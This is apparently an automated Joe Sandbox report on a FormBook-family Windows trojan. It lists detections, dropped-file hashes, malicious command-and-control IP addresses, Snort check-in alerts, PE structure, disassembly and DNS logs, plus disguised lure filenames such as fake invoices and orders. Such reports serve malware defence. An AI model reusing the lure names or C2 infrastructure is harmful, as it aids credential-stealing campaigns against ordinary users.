          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\h1luljvls0ea.dll | 22% | ReversingLabs | Win32.Trojan.Convagent
          C:\Users\user\AppData\Local\Temp\nsr575.tmp\System.dll | 0% | Metadefender |
          C:\Users\user\AppData\Local\Temp\nsr575.tmp\System.dll | 0% | ReversingLabs |

          Unpacked PE Files

          Source | Detection | Scanner | Label
          0.2.lpdKSOB78u.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          0.2.lpdKSOB78u.exe.2a30000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.1.lpdKSOB78u.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          0.0.lpdKSOB78u.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          1.2.lpdKSOB78u.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.0.lpdKSOB78u.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366

          Domains

          No Antivirus matches

          URLs


          Domains and IPs

          Contacted Domains


          Contacted URLs


                                                    URLs from Memory and Binaries


                                                                              Contacted IPs


                                                                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
23.253.73.122 | unknown | United States | 33070 | RMH-14US | false
104.21.76.239 | unknown | United States | 13335 | CLOUDFLARENETUS | true
154.213.108.250 | unknown | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | true
208.91.197.27 | unknown | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | true
34.102.136.180 | unknown | United States | 15169 | GOOGLEUS | true
23.224.206.45 | unknown | United States | 40065 | CNSERVERSUS | true
92.249.45.191 | unknown | Germany | 47583 | AS-HOSTINGERLT | true
3.223.115.185 | unknown | United States | 14618 | AMAZON-AESUS | false

                                                                              General Information

                                                                              Joe Sandbox Version:31.0.0 Emerald
                                                                              Analysis ID:356515
                                                                              Start date:23.02.2021
                                                                              Start time:09:17:28
                                                                              Joe Sandbox Product:CloudBasic
                                                                              Overall analysis duration:0h 9m 40s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Sample file name:lpdKSOB78u.exe
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                              Number of analysed new started processes analysed:33
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:1
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • HDC enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.evad.winEXE@7/4@14/8
                                                                              EGA Information:Failed
                                                                              HDC Information:
                                                                              • Successful, ratio: 34.3% (good quality ratio 31.6%)
                                                                              • Quality average: 76.3%
                                                                              • Quality standard deviation: 30.8%
                                                                              HCA Information:
                                                                              • Successful, ratio: 85%
                                                                              • Number of executed functions: 99
                                                                              • Number of non-executed functions: 61
                                                                              Cookbook Comments:
                                                                              • Adjust boot time
                                                                              • Enable AMSI
                                                                              • Found application associated with file extension: .exe
                                                                              Warnings:
                                                                              • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 52.255.188.83, 92.122.145.220, 104.43.139.144, 23.218.208.56, 51.104.144.132, 2.20.142.209, 2.20.142.210, 13.88.21.125, 104.42.151.234, 40.88.32.150, 13.64.90.137, 52.155.217.156, 20.54.26.129, 92.122.213.247, 92.122.213.194, 51.104.139.180
                                                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

                                                                              Simulations

                                                                              Behavior and APIs

                                                                              No simulations

                                                                              Joe Sandbox View / Context

                                                                              IPs


                                                                              Domains


                                                                              ASN


                                                                              JA3 Fingerprints

                                                                              No context

                                                                              Dropped Files


                                                                                                                        Created / dropped Files

                                                                                                                        C:\Users\user\AppData\Local\Temp\gnozo.to
                                                                                                                        Process:C:\Users\user\Desktop\lpdKSOB78u.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):164352
                                                                                                                        Entropy (8bit):7.998821656833136
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:3072:fUg86Ct0w2hlcy7em7/58mdrJqnEFSgbo11gctxilAYhY8Bck+oUgnsBOZwATntw:fUGq0w2PcyaIeEo11gctwhY8pegsI/za
                                                                                                                        MD5:59AE456E24441D5E7F9F4D2DFF1DD1EB
                                                                                                                        SHA1:8BA26F46F1A65A49868400743D436655925978BD
                                                                                                                        SHA-256:B51CFCEAB1182BC387D9D9BFEE94F63568BDBB6053EADD8F16EFA13AD4F1CF42
                                                                                                                        SHA-512:E9B4E67FA5396CB4735EA0A8820008D15B76327ED4859A5C94CF2701101C8691C729C341BB3878F6E14C1D601BEB9F63BF37374505FD9B628058BAA2B592D792
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        C:\Users\user\AppData\Local\Temp\h1luljvls0ea.dll
                                                                                                                        Process:C:\Users\user\Desktop\lpdKSOB78u.exe
                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):11776
                                                                                                                        Entropy (8bit):6.685010863062865
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:TXpDSLwlu1zjaFBo4T655+7JHmIQ+HWjDDR+:j4P0Xj6kHeF
                                                                                                                        MD5:1C0F964867E07CAC225A8CE5429F5737
                                                                                                                        SHA1:8129559E23C4985E024CD18C42DB54EFFC45B72F
                                                                                                                        SHA-256:41B9F5241987338FAA262090BEAB1ADF4A9821497011BBE87D3A770F2C926666
                                                                                                                        SHA-512:EF6E7764E4B57DFFE5A66C5154FF556802BF94F142070DB2B2B179CB8DF19FB45A176212818FDBA8D6D1994ABF4E2152BBC2BE76757B00D818230CE862A5AD80
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 22%
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: ORDER LIST.xlsx, Detection: malicious, Browse
                                                                                                                        Reputation:low
                                                                                                                        C:\Users\user\AppData\Local\Temp\nsr575.tmp\System.dll
                                                                                                                        Process:C:\Users\user\Desktop\lpdKSOB78u.exe
                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):11776
                                                                                                                        Entropy (8bit):5.855045165595541
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                                                        MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                                                        SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                                                        SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                                                        SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: 523JHfbGM1.exe, Detection: malicious, Browse
                                                                                                                        • Filename: TAk8jeG5ob.exe, Detection: malicious, Browse
                                                                                                                        • Filename: PAYMENT COPY.exe, Detection: malicious, Browse
                                                                                                                        • Filename: ORDER LIST.xlsx, Detection: malicious, Browse
                                                                                                                        • Filename: Orderoffer.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Our New Order Feb 23 2021 at 2.30_PVV440_PDF.exe, Detection: malicious, Browse
                                                                                                                        • Filename: INV_PR2201.docm, Detection: malicious, Browse
• Filename: CV-JOB REQUEST______PDF.EXE, Detection: malicious
• Filename: Request for Quotation.exe, Detection: malicious
• Filename: #U007einvoice#U007eSC00978656.xlsx, Detection: malicious
• Filename: Purchase Order___pdf ____________.exe, Detection: malicious
• Filename: quote.exe, Detection: malicious
• Filename: Order83930.exe, Detection: malicious
• Filename: Invoice 6500TH21Y5674.exe, Detection: malicious
• Filename: Invoice 6500TH21Y5674.exe, Detection: malicious
• Filename: GPP.exe, Detection: malicious
• Filename: OrderSuppliesQuote0817916.exe, Detection: malicious
• Filename: ACCOUNT DETAILS.exe, Detection: malicious
• Filename: Quotation.com.exe, Detection: malicious
• Filename: Unterlagen PDF.exe, Detection: malicious
                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                        C:\Users\user\AppData\Local\Temp\nsx546.tmp
                                                                                                                        Process:C:\Users\user\Desktop\lpdKSOB78u.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):191414
                                                                                                                        Entropy (8bit):7.87694518740932
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:ta7Ug86Ct0w2hlcy7em7/58mdrJqnEFSgbo11gctxilAYhY8Bck+oUgnsBOZwATT:t8UGq0w2PcyaIeEo11gctwhY8pegsI//
                                                                                                                        MD5:BB7752BBCB8FD3C0AFD1F7247FFE4122
                                                                                                                        SHA1:60ABE13804AF8FC3B8C73512D9D5EF548920804C
                                                                                                                        SHA-256:CA2DACE75E51170F2D464B3DC536C5A65CA234E357C8AB7686073E3D2529BA3B
                                                                                                                        SHA-512:DEDB3C0E7283973927D37F1ACFF4168FEF6222EF061C2ED5A0D8A0B4E1E811F610C2D7FF1F258DBAFA7A6CE0873118C7E222878D75EAE67D62C10667111B9BE2
                                                                                                                        Malicious:false

                                                                                                                        Static File Info

                                                                                                                        General

                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                        Entropy (8bit):7.894792410239027
                                                                                                                        TrID:
                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                        File name:lpdKSOB78u.exe
                                                                                                                        File size:217653
                                                                                                                        MD5:f10054d325df455c58ecb16ea660d3f2
                                                                                                                        SHA1:54871af48b64576922b97965efeeea94976bc119
                                                                                                                        SHA256:b060cb81afd9113cfbbb1e346c99e503c545da47ed80096c021b7ca41c064c76
                                                                                                                        SHA512:4ea16d3dbae5b9746aeea79d180b7f1a8932ca8c64bfc95dce1d22376d1d0eada03db8033c1f59212837befa4dc35ad285b1dfc5b6d57d2eda402f968f4b2117
                                                                                                                        SSDEEP:6144:K11Q2tLhQtI6Vjw2PcyaseEo11+ctwhY8pggsIPj1ur:QFgNhri1jWhYlg/Pjm
                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L..._.$_.................f...x.......4............@

                                                                                                                        File Icon

                                                                                                                        Icon Hash:00828e8e8686b000

                                                                                                                        Static PE Info

                                                                                                                        General

                                                                                                                        Entrypoint:0x403486
                                                                                                                        Entrypoint Section:.text
                                                                                                                        Digitally signed:false
                                                                                                                        Imagebase:0x400000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                        Time Stamp:0x5F24D75F [Sat Aug 1 02:45:51 2020 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:4
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:4
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:4
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:ea4e67a31ace1a72683a99b80cf37830

                                                                                                                        Entrypoint Preview

                                                                                                                        Instruction
                                                                                                                        sub esp, 00000184h
                                                                                                                        push ebx
                                                                                                                        push esi
                                                                                                                        push edi
                                                                                                                        xor ebx, ebx
                                                                                                                        push 00008001h
                                                                                                                        mov dword ptr [esp+18h], ebx
                                                                                                                        mov dword ptr [esp+10h], 0040A130h
                                                                                                                        mov dword ptr [esp+20h], ebx
                                                                                                                        mov byte ptr [esp+14h], 00000020h
                                                                                                                        call dword ptr [004080B0h]
                                                                                                                        call dword ptr [004080C0h]
                                                                                                                        and eax, BFFFFFFFh
                                                                                                                        cmp ax, 00000006h
                                                                                                                        mov dword ptr [0042F44Ch], eax
                                                                                                                        je 00007F73D894C073h
                                                                                                                        push ebx
                                                                                                                        call 00007F73D894F1EEh
                                                                                                                        cmp eax, ebx
                                                                                                                        je 00007F73D894C069h
                                                                                                                        push 00000C00h
                                                                                                                        call eax
                                                                                                                        mov esi, 004082A0h
                                                                                                                        push esi
                                                                                                                        call 00007F73D894F16Ah
                                                                                                                        push esi
                                                                                                                        call dword ptr [004080B8h]
                                                                                                                        lea esi, dword ptr [esi+eax+01h]
                                                                                                                        cmp byte ptr [esi], bl
                                                                                                                        jne 00007F73D894C04Dh
                                                                                                                        push 0000000Bh
                                                                                                                        call 00007F73D894F1C2h
                                                                                                                        push 00000009h
                                                                                                                        call 00007F73D894F1BBh
                                                                                                                        push 00000007h
                                                                                                                        mov dword ptr [0042F444h], eax
                                                                                                                        call 00007F73D894F1AFh
                                                                                                                        cmp eax, ebx
                                                                                                                        je 00007F73D894C071h
                                                                                                                        push 0000001Eh
                                                                                                                        call eax
                                                                                                                        test eax, eax
                                                                                                                        je 00007F73D894C069h
                                                                                                                        or byte ptr [0042F44Fh], 00000040h
                                                                                                                        push ebp
                                                                                                                        call dword ptr [00408038h]
                                                                                                                        push ebx
                                                                                                                        call dword ptr [00408288h]
                                                                                                                        mov dword ptr [0042F518h], eax
                                                                                                                        push ebx
                                                                                                                        lea eax, dword ptr [esp+38h]
                                                                                                                        push 00000160h
                                                                                                                        push eax
                                                                                                                        push ebx
                                                                                                                        push 00429878h
                                                                                                                        call dword ptr [0040816Ch]
                                                                                                                        push 0040A1ECh

                                                                                                                        Rich Headers

                                                                                                                        Programming Language:
                                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                        Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8544 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x38000 | 0x994 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x29c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                                                                        Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x65ad | 0x6600 | False | 0.675628063725 | data | 6.48593060343 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1380 | 0x1400 | False | 0.4634765625 | data | 5.26110074066 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x25558 | 0x600 | False | 0.470052083333 | data | 4.21916068772 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x30000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x38000 | 0x994 | 0xa00 | False | 0.459375 | data | 4.33293034177 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                        Resources

Name | RVA | Size | Type | Language | Country
RT_DIALOG | 0x38148 | 0x100 | data | English | United States
RT_DIALOG | 0x38248 | 0x11c | data | English | United States
RT_DIALOG | 0x38364 | 0x60 | data | English | United States
RT_VERSION | 0x383c4 | 0x290 | MS Windows COFF PA-RISC object file | English | United States
RT_MANIFEST | 0x38654 | 0x340 | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                                                                                                        Imports

DLL | Import
ADVAPI32.dll | RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
SHELL32.dll | SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
ole32.dll | IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll | SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, GetTempFileNameA, RemoveDirectoryA, WriteFile, CreateDirectoryA, GetLastError, CreateProcessA, GlobalLock, GlobalUnlock, CreateThread, lstrcpynA, SetErrorMode, GetDiskFreeSpaceA, lstrlenA, GetCommandLineA, GetVersion, GetWindowsDirectoryA, SetEnvironmentVariableA, GetTempPathA, CopyFileA, GetCurrentProcess, ExitProcess, GetModuleFileNameA, GetFileSize, ReadFile, GetTickCount, Sleep, CreateFileA, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                                                                                                        Version Infos

Description | Data
LegalCopyright | Copyright Nyangbara
FileVersion | 28.32.13.56
CompanyName | Sungkai
LegalTrademarks | Template Method Pattern
Comments | colostrum
ProductName | Kalumpang
FileDescription | code of ethics
Translation | 0x0409 0x04e4

                                                                                                                        Possible Origin

Language of compilation system | Country where language is spoken
English | United States

                                                                                                                        Network Behavior

                                                                                                                        Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
02/23/21-09:19:35.940804 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49735 | 80 | 192.168.2.3 | 23.224.206.45
02/23/21-09:19:35.940804 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49735 | 80 | 192.168.2.3 | 23.224.206.45
02/23/21-09:19:35.940804 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49735 | 80 | 192.168.2.3 | 23.224.206.45
02/23/21-09:19:41.421806 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49740 | 34.102.136.180 | 192.168.2.3
02/23/21-09:19:52.076121 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49747 | 80 | 192.168.2.3 | 34.102.136.180
02/23/21-09:19:52.076121 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49747 | 80 | 192.168.2.3 | 34.102.136.180
02/23/21-09:19:52.076121 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49747 | 80 | 192.168.2.3 | 34.102.136.180
02/23/21-09:19:52.215911 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49747 | 34.102.136.180 | 192.168.2.3
02/23/21-09:19:57.363088 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49748 | 80 | 192.168.2.3 | 104.21.76.239
02/23/21-09:19:57.363088 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49748 | 80 | 192.168.2.3 | 104.21.76.239
02/23/21-09:19:57.363088 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49748 | 80 | 192.168.2.3 | 104.21.76.239
02/23/21-09:20:13.180762 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49752 | 80 | 192.168.2.3 | 34.102.136.180
02/23/21-09:20:13.180762 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49752 | 80 | 192.168.2.3 | 34.102.136.180
02/23/21-09:20:13.180762 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49752 | 80 | 192.168.2.3 | 34.102.136.180
02/23/21-09:20:13.319901 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49752 | 34.102.136.180 | 192.168.2.3
02/23/21-09:20:23.514893 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49753 | 80 | 192.168.2.3 | 34.102.136.180
02/23/21-09:20:23.514893 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49753 | 80 | 192.168.2.3 | 34.102.136.180
02/23/21-09:20:23.514893 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49753 | 80 | 192.168.2.3 | 34.102.136.180
02/23/21-09:20:23.654359 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49753 | 34.102.136.180 | 192.168.2.3

                                                                                                                        Network Port Distribution

                                                                                                                        TCP Packets


                                                                                                                        UDP Packets

                                                                                                                        Feb 23, 2021 09:19:29.919332981 CET53505408.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:30.287633896 CET5436653192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:30.360156059 CET53543668.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:30.753460884 CET5303453192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:30.810342073 CET53530348.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:31.004024029 CET5776253192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:31.055495977 CET53577628.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:31.646888018 CET5543553192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:31.704104900 CET53554358.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:32.155848980 CET5071353192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:32.208286047 CET53507138.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:32.587729931 CET5613253192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:32.648315907 CET53561328.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:33.364005089 CET5898753192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:33.415467024 CET53589878.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:33.951195955 CET5657953192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:34.011198997 CET53565798.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:34.285038948 CET6063353192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:34.336524963 CET53606338.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:35.511317968 CET6129253192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:35.565466881 CET6361953192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:35.614231110 CET53636198.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:35.676973104 CET6493853192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:35.724052906 CET53612928.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:35.736579895 CET53649388.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:36.271919966 CET6194653192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:36.329251051 CET53619468.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:36.744668007 CET6491053192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:36.795408964 CET53649108.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:38.017047882 CET5212353192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:38.067193985 CET53521238.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:41.169655085 CET5613053192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:41.233515024 CET53561308.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:41.996720076 CET5633853192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:42.055108070 CET53563388.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:46.435403109 CET5942053192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:46.513928890 CET53594208.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:51.971105099 CET5878453192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:52.033718109 CET53587848.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:57.238603115 CET6397853192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:57.298604012 CET53639788.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:20:02.453564882 CET6293853192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:20:02.551256895 CET53629388.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:20:07.589055061 CET5570853192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:20:07.752645969 CET53557088.8.8.8192.168.2.3
